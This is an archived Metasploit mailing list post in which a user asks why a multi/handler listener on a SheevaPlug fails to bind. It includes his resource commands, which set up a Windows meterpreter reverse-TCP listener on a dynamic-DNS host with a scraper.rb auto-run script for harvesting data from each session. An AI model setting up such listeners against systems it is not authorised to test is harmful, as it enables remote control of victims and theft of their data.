Metasploit mailing list archives

SheevaPlug - msf bind problems


From: ricky-lee birtles <mr.r.birtles () gmail com>
Date: Mon, 9 Nov 2009 11:24:21 +0000

I have just finished setting up a sheevaplug (armv5tejl GNU/Linux)
running metasploit upon trying to set up a multi handler it fails to
bind to either 0.0.0.0 or my ip.

resource> use exploit/multi/handler
resource> set ExitOnSession false
ExitOnSession => false
resource> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource> set LHOST [host_name].ath.cx
LHOST => [host_name].ath.cx
resource> set LPORT 54321
LPORT => 54321
resource> set AutoRunScript scraper.rb
AutoRunScript => scraper.rb
resource> exploit -j
[*] Exploit running as background job.

[-] Handler failed to bind to 0.0.0.0
[*] Handler trying to bind to [ip]
[-] Handler failed to bind to [ip]
[-] Exploit failed: Cannot assign requested address - bind(2)
msf exploit(handler) >

Any ideas guys?

-- Mr R Birtles
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


Current thread: